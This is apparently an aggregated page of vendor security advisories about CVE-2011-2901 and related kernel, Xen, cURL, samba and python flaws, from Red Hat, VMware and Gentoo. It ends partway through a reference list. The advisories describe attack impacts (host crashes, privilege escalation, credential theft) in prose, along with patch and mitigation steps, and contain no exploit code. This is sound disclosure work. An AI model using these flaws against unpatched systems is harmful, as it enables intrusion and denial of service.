Off-by-one error in the __addr_ok macro in Xen 3.3 and earlier allows local 64 bit PV guest administrators to cause a denial of service (host crash) via unspecified hypercalls that ignore virtual-address bits. Xen is prone to a denial-of-service vulnerability due to an off-by-one error. An attacker with access to a guest operating system can exploit this issue to crash the host operating system, effectively denying service to legitimate users. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed,. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following products are affected: JP1/IT Resource Management - Manager JP1/IT Service Level Management - Manager.

This update also fixes several bugs. Documentation for these bug fixes will be available shortly from the Technical Notes document linked to in the References section.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:

Red Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64

  1. Description:

These packages contain the Linux kernel.

This update fixes the following security issues:

  • A flaw in the Stream Control Transmission Protocol (SCTP) implementation could allow a remote attacker to cause a denial of service by sending a specially-crafted SCTP packet to a target system. (CVE-2011-2482, Important)

If you do not run applications that use SCTP, you can prevent the sctp module from being loaded by adding the following to the end of the "/etc/modprobe.d/blacklist.conf" file:

blacklist sctp

This way, the sctp module cannot be loaded accidentally, which may occur if an application that requires SCTP is started. A reboot is not necessary for this change to take effect.

  • A flaw in the client-side NFS Lock Manager (NLM) implementation could allow a local, unprivileged user to cause a denial of service. (CVE-2011-2491, Important)

  • Flaws in the netlink-based wireless configuration interface could allow a local user, who has the CAP_NET_ADMIN capability, to cause a denial of service or escalate their privileges on systems that have an active wireless interface. (CVE-2011-2517, Important)

  • A flaw was found in the way the Linux kernel's Xen hypervisor implementation emulated the SAHF instruction. When using a fully-virtualized guest on a host that does not use hardware assisted paging (HAP), such as those running CPUs that do not have support for (or those that have it disabled) Intel Extended Page Tables (EPT) or AMD Virtualization (AMD-V) Rapid Virtualization Indexing (RVI), a privileged guest user could trigger this flaw to cause the hypervisor to crash. (CVE-2011-2519, Moderate)

  • A flaw in the __addr_ok() macro in the Linux kernel's Xen hypervisor implementation when running on 64-bit systems could allow a privileged guest user to crash the hypervisor. (CVE-2011-2901, Moderate)

  • /proc/[PID]/io is world-readable by default. Previously, these files could be read without any further restrictions. A local, unprivileged user could read these files, belonging to other, possibly privileged processes to gather confidential information, such as the length of a password used in a process. (CVE-2011-2495, Low)

Red Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and Vasiliy Kulikov of Openwall for reporting CVE-2011-2495.

This update also fixes the following bugs:

  • On Broadcom PCI cards that use the tg3 driver, the operational state of a network device, represented by the value in "/sys/class/net/ethX/operstate", was not initialized by default. Consequently, the state was reported as "unknown" when the tg3 network device was actually in the "up" state. This update modifies the tg3 driver to properly set the operstate value. (BZ#744699)

  • A KVM (Kernel-based Virtual Machine) guest can get preempted by the host, when a higher priority process needs to run. When a guest is not running for several timer interrupts in a row, ticks could be lost, resulting in the jiffies timer advancing slower than expected and timeouts taking longer than expected. To correct for the issue of lost ticks, do_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when running as a KVM guest) to see if timer interrupts have been missed. If so, jiffies is incremented by the number of missed timer interrupts, ensuring that programs are woken up on time. (BZ#747874)

  • When a block device object was allocated, the bd_super field was not being explicitly initialized to NULL. Previously, users of the block device object could set bd_super to NULL when the object was released by calling the kill_block_super() function. Certain third-party file systems do not always use this function, and bd_super could therefore become uninitialized when the object was allocated again. This could cause a kernel panic in the blkdev_releasepage() function, when the uninitialized bd_super field was dereferenced. Now, bd_super is properly initialized in the bdget() function, and the kernel panic no longer occurs. (BZ#751137)

  • Solution:

Users should upgrade to these updated packages, which contain backported patches to resolve these issues. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):

709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing NFS share 714867 - CVE-2011-2482 kernel: sctp dos 716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak 718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations 718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation 728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()

  1. Package List:

Red Hat Enterprise Linux EUS (v. 5.6 server):

Source: kernel-2.6.18-238.31.1.el5.src.rpm

i386: kernel-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm kernel-debug-2.6.18-238.31.1.el5.i686.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm kernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm kernel-devel-2.6.18-238.31.1.el5.i686.rpm kernel-headers-2.6.18-238.31.1.el5.i386.rpm kernel-xen-2.6.18-238.31.1.el5.i686.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm

ia64: kernel-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm kernel-devel-2.6.18-238.31.1.el5.ia64.rpm kernel-headers-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm

noarch: kernel-doc-2.6.18-238.31.1.el5.noarch.rpm

ppc: kernel-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm kernel-devel-2.6.18-238.31.1.el5.ppc64.rpm kernel-headers-2.6.18-238.31.1.el5.ppc.rpm kernel-headers-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm

s390x: kernel-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm kernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm kernel-devel-2.6.18-238.31.1.el5.s390x.rpm kernel-headers-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm

x86_64: kernel-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm kernel-devel-2.6.18-238.31.1.el5.x86_64.rpm kernel-headers-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2011-2482.html https://www.redhat.com/security/data/cve/CVE-2011-2491.html https://www.redhat.com/security/data/cve/CVE-2011-2495.html https://www.redhat.com/security/data/cve/CVE-2011-2517.html https://www.redhat.com/security/data/cve/CVE-2011-2519.html https://www.redhat.com/security/data/cve/CVE-2011-2901.html https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2012-0001 Synopsis: VMware ESXi and ESX updates to third party library and ESX Service Console Issue date: 2012-01-30 Updated on: 2012-01-30 (initial advisory)

CVE numbers: --- COS Kernel --- CVE-2011-0726, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494, CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649, CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182, CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745, CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022, CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525, CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495, CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 --- COS cURL --- CVE-2011-2192 --- COS rpm --- CVE-2010-2059, CVE-2011-3378 --- COS samba --- CVE-2010-0547, CVE-2010-0787, CVE-2011-1678, CVE-2011-2522, CVE-2011-2694 --- COS python --- CVE-2009-3720, CVE-2010-3493, CVE-2011-1015, CVE-2011-1521 --- python library --- CVE-2009-3560, CVE-2009-3720, CVE-2010-1634, CVE-2010-2089, CVE-2011-1521


  1. Summary

VMware ESXi and ESX updates to third party library and ESX Service Console address several security issues.

  1. Relevant releases

ESXi 4.1 without patch ESXi410-201201401-SG

ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG, ESX410-201201407-SG

  1. Problem Description

a. ESX third party update for Service Console kernel

The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,
CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,
CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201401-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

b. ESX third party update for Service Console cURL RPM

The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-2192 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201402-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

c. ESX third party update for Service Console nspr and nss RPMs

The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.

A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201404-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

d. ESX third party update for Service Console rpm RPMs

The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201406-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

e. ESX third party update for Service Console samba RPMs

The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522 and CVE-2011-2694 to these issues.

Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201407-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

f. ESX third party update for Service Console python package

The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and
CVE-2011-1521 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201405-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESXi update to third party component python

The python third party library is updated to python 2.5.6 which
fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, and CVE-2011-1521 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           5.0       ESXi     patch pending
ESXi           4.1       ESXi     ESXi410-201201401-SG
ESXi           4.0       ESXi     patch pending
ESXi           3.5       ESXi     patch pending

ESX            4.1       ESX      not affected
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected

* hosted products are VMware Workstation, Player, ACE, Fusion.
  1. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware ESXi 4.1


ESXi410-201201401 http://downloads.vmware.com/go/selfsupport-download md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F http://kb.vmware.com/kb/2009143 ESXi410-201201401 contains ESXi410-201201401-SG

VMware ESX 4.1


ESX410-201201001 http://downloads.vmware.com/go/selfsupport-download md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC http://kb.vmware.com/kb/2009142

ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and ESX410-201201407-SG

  1. References

CVE numbers

--- COS Kernel --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901 --- COS cURL --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192 --- COS rpm --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378 --- COS samba --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694 --- COS python --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521 --- python library --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521


  1. Change log

2012-01-30 VMSA-2012-0001 Initial security advisory in conjunction with the release of patches for ESX 4.1 and ESXi 4.1 on 2012-01-30.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2012 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8

wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8 f2pLxi537s+ew4dvnYNWlJ8= =OAh4 -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201309-24


                                        http://security.gentoo.org/

Severity: High Title: Xen: Multiple vulnerabilities Date: September 27, 2013 Bugs: #385319, #386371, #420875, #431156, #454314, #464724, #472214, #482860 ID: 201309-24


Synopsis

Multiple vulnerabilities have been found in Xen, allowing attackers on a Xen Virtual Machine to execute arbitrary code, cause Denial of Service, or gain access to data on the host.

Background

Xen is a bare-metal hypervisor.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/xen < 4.2.2-r1 >= 4.2.2-r1 2 app-emulation/xen-tools < 4.2.2-r3 >= 4.2.2-r3 3 app-emulation/xen-pvgrub < 4.2.2-r1 >= 4.2.2-r1 ------------------------------------------------------------------- 3 affected packages

Description

Multiple vulnerabilities have been discovered in Xen. Please review the CVE identifiers referenced below for details.

Impact

Guest domains could possibly gain privileges, execute arbitrary code, or cause a Denial of Service on the host domain (Dom0). Additionally, guest domains could gain information about other virtual machines running on the same host or read arbitrary files on the host.

Workaround

The CVEs listed below do not currently have fixes, but only apply to Xen setups which have "tmem" specified on the hypervisor command line. TMEM is not currently supported for use in production systems, and administrators using tmem should disable it. Relevant CVEs: * CVE-2012-2497 * CVE-2012-6030 * CVE-2012-6031 * CVE-2012-6032 * CVE-2012-6033 * CVE-2012-6034 * CVE-2012-6035 * CVE-2012-6036

Resolution

All Xen users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.2.2-r1"

All Xen-tools users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.2.2-r3"

All Xen-pvgrub users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot -v ">=app-emulation/xen-pvgrub-4.2.2-r1"

References

[ 1 ] CVE-2011-2901 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2901 [ 2 ] CVE-2011-3262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262 [ 3 ] CVE-2011-3262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262 [ 4 ] CVE-2012-0217 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0217 [ 5 ] CVE-2012-0218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0218 [ 6 ] CVE-2012-2934 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2934 [ 7 ] CVE-2012-3432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3432 [ 8 ] CVE-2012-3433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3433 [ 9 ] CVE-2012-3494 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3494 [ 10 ] CVE-2012-3495 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3495 [ 11 ] CVE-2012-3496 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3496 [ 12 ] CVE-2012-3497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3497 [ 13 ] CVE-2012-3498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3498 [ 14 ] CVE-2012-3515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3515 [ 15 ] CVE-2012-4411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4411 [ 16 ] CVE-2012-4535 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4535 [ 17 ] CVE-2012-4536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4536 [ 18 ] CVE-2012-4537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4537 [ 19 ] CVE-2012-4538 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4538 [ 20 ] CVE-2012-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4539 [ 21 ] CVE-2012-5510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5510 [ 22 ] CVE-2012-5511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5511 [ 23 ] CVE-2012-5512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5512 [ 24 ] CVE-2012-5513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5513 [ 25 ] CVE-2012-5514 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5514 [ 26 ] CVE-2012-5515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5515 [ 27 ] CVE-2012-5525 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5525 [ 28 ] CVE-2012-5634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5634 [ 29 ] CVE-2012-6030 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6030 [ 30 ] CVE-2012-6031 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6031 [ 31 ] CVE-2012-6032 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6032 [ 32 ] CVE-2012-6033 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6033 [ 33 ] CVE-2012-6034 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6034 [ 34 ] CVE-2012-6035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6035 [ 35 ] CVE-2012-6036 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6036 [ 36 ] CVE-2012-6075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6075 [ 37 ] CVE-2012-6333 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6333 [ 38 ] CVE-2013-0151 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0151 [ 39 ] CVE-2013-0152 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0152 [ 40 ] CVE-2013-0153 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0153 [ 41 ] CVE-2013-0154 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0154 [ 42 ] CVE-2013-0215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0215 [ 43 ] CVE-2013-1432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1432 [ 44 ] CVE-2013-1917 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1917 [ 45 ] 